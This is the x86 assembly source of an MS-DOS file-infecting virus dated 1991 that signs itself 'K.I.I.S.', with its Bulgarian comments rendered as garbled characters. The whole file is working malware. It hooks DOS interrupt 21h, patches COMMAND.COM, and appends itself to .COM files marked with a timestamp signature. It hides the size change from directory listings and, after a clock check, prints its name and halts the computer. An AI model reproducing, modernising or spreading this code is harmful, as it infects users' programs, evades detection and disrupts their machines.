;************************************************************************; ;* T®§¨ Virus ¥ ¯° ¢¥ 25.10.1991 £. ¢ *; ;* *; ;* ‘“ " ‘¢. Š«¨¬¥² Žµ°¨¤±ª¨ " ¢ 17:18.30 hour *; ;* *; ;* ±² ¿ 316 ”.Œ.ˆ. *; ;************************************************************************; start: jmp short begin db (00h) db (53h) ; ‡ ° §¯®§ ¢ ¥ ¢¨°³± db (4bh) ; „ «¨ ´ ©« ¥ § ° §¥ int 20h okey: db (0b8h) db (03h) db (00h) db (0cdh) db (10h) begin: push cx ; CALL F1 ; F1: POP SI ; ‡ ¢º§±² ®¢¿¢ ¥ ¯º°¢¨²¥ 5 ¡ ©² SUB SI,09 ; PUSH SI ; cld ; mov di,100h ; mov cx,5 ; rep movsb ; jmp ding2 new21: pushf ; CALL ªº¬ ®°¨£¨ «®²® INT 21h push cs ; IBMDOS.COM - ± ¶¥« ¤ ¥ ²¥ µ¢ - call Word ptr cs:[8c0h] ; ² ¿ª®© ¯°®£° ¬¨ § ¢¨°³±¨ ret ; ª ²® Anti4us.exe, NDD ¨ ².. int21h: STI cmp ah,4bh ; °¨ ±² °²¨° ¥ ´ ©« jz mm ; cmp ah,11h ; °¨ ²º°±¥¥ ¯º°¢¨ ¨ ¢²®°¨ ´ ©« jz home ; ± ¶¥« ¯°¨ DIR ¤ ±ª°¨¢ ¢¨°³± . cmp ah,12h ; jz home jmp int1hh home: call new21 ; °®¶¥¤³° ª ²® ¯°¨ DIR ¯°®¢¥°¿¢ push ax ; ¤ «¨ · ± ¥ 10:26 ¨ , ª® ¥ § ·¨ push bx ; ´ ©« ¥ § ° §¥ ¨ ¨§¢ ¦¤ ¤º«¦¨ - push es ; ² ¢¨°³± ¤ ¥ ±¥ § ¡¥«¿§¢ ; ®£®«¥¬¿¢ ¥²® ´ ©« . mov ah,2fh ; ‚§¥¬ DTA ¢ ES:BX . — ± ¥ ¢ bx+1eh call new21 ; ’³ª ¥ 10:26 ; mov ax,534bh cmp Word ptr es:[bx+1eh],ax jnz ox mov ax,End-Okey+3 sub Word ptr es:[bx+24h],ax ox: pop es ; €ª® ¥ ¥ 10:26 , ²® § ·¨ ¿¬ ¸ pop bx ; ¢¨°³± ¨ ¿¬ ¤ ¬ «¨ · ± ± pop ax ; ¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ ¨«¨ ¤º«- db (0CAh) ; ¦¨ ² ¢¨°³± ¢ ±«³·¥¿. dw (2) ;****************************************************; ;* ‡ ° § ¿ ¢ ¥ *; ;****************************************************; mm: pushf PUSH AX PUSH BX PUSH CX PUSH DX PUSH DS PUSH ES PUSH SI PUSH DI xor ax,ax mov ds,ax mov di,[0194h] mov es,[0196h] mov ax,[004ch] mov bx,[004eh] mov cx,0f000h mov dx,0ec59h mov [0100h],dx mov [0102h],cx mov [0198h],ax mov [019ah],bx mov [004ch],di mov [004eh],es mov ax,0a15h+new24-begin push cs pop ds push cs pop es mov ah,2ch call new21 cmp cx,0200h jna mm1 mov ax,0003h int 10h mov ah,09h mov dx,0a15h+n-begin call new21 cli hlt dinge: jmp ding mm1: mov ah,2fh ;Dos service function ah=2FH (get DTA) call new21 mov cs:[8b0h],es mov cs:[8b2h],bx MOV AH,4eH MOV DX,0a10h+files-okey mov cx,0 call new21 jc dinge ;CX File attribute ;DS:DX Pointer of filespec (ASCIIZ string) vir: mov ax,534bh cmp es:[bx+16h],ax jnz fuck vir1: mov ah,4fh call new21 jc enzi jmp short vir enzi: jmp ding fuck: mov cx,1500 cmp es:[bx+1ah],cx jna vir1 fuck1: push es pop ds mov ax,3d02h mov dx,bx add dx,1eh call new21 mov cs:[0a10h+handle-okey],ax mov bx,ax push cs pop ds mov ah,3fh mov dx,0a10h mov cx,5 call new21 mov di,0a10h+end-okey mov al,0e9h mov [di],al inc di mov bx,[8b2h] mov cx,es:[bx+1ah] inc cx inc cx mov [di],cx inc di inc di mov ax,534bh mov [di],ax mov bx,cs:[0a10h+handle-okey] mov ax,4200h xor cx,cx xor dx,dx call new21 mov ah,40h mov dx,0a10h+end-okey mov cx,5 call new21 mov ax,4202h xor cx,cx xor dx,dx call new21 push cs pop ds mov bx,cs:[0a10h+handle-okey] mov ah,40h mov dx,0a10h mov cx,end-okey-3 call new21 mov bx,cs:[0a10h+handle-okey] mov ax,5700h call new21 mov ax,5701h mov cx,534bh call new21 mov ah,3eh call new21 ding: xor ax,ax mov ds,ax mov ax,[0198h] mov bx,[019ah] mov [004ch],ax mov [004eh],bx POP DI POP SI POP ES POP DS POP DX POP CX POP BX POP AX popf int1hh: jmp word ptr cs:[8c0h] ; °¥ªº±¢ ¥ 21 files: db '*.com',0 ; ‡ ° §¿¢ ± ¬® COM ´ ©«®¢¥ new24: mov al,03 ; Int 24h ¤ ¥ ¤ ¢ Write Protect iret ding2: MOV AX,0070h ; ‚«¨§ ¢ ±¥£¬¥ 0070h: ¨ ¯°¥²º°±¢ MOV ES,AX ; § ¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ INT13H MOV DI,0000h MOV AX,80FBh non1: CLD MOV CX,0FFFFh non2: REPNZ SCASW JZ non MOV DI,0001h JMP non1 non: MOV BX,02FCh CMP ES:[DI],BX JNZ non2 DEC DI DEC DI xor ax,ax ; £« ±¿ ®¢®²® ¯°¥ªº±¢ ¥ INT13H ¨ mov ds,ax ; ¨ ±¥ ¯®¤£®²¢¿ § ° ¡®² mov [0194h],di mov [0196h],es mov es,[009eh] mov bx,[00a0h] push cs pop ds MOV BP,DS pop si push si ; °¥µ¢º°«¿ ¢¨°³± ¢ ±²¥ª MOV DI,0a10h ; COMMAND.COM MOV CX,Handle-Okey ; € ±º¹® ² ª ¨ ¯®¤£®²¢¿ REP MOVSB ; ¢¨°³± ¤®¡°¥ ¤ ±¥ ³ª°¥¯¨ PUSH ES ; ¨ ®¯«¥²¥ ± Int 21h LEA DI,[BX+1bh] MOV AL,0e9h STOSB MOV AX,0A30h SUB AX,DI STOSW MOV AX,9090H STOSW STOSW MOV ES:[8c0h],DI MOV AX,SS SUB AX,0018h CLI MOV SS,AX STI MOV DS,BP POP ES pop si pop cx xor ax,ax xor bx,bx xor dx,dx xor si,si mov di,100h push di xor di,di ret n: db "K.I.I.S.ø ",024h ; ’®§¨ ²¥±² ±¥ ®²¯¥· ²¢ ±«¥¤ 2 · ± . handle: dw ? ; € ±º¹® ² ª ¡«®ª¨° ª®¬¯¾²º° . end: db (00)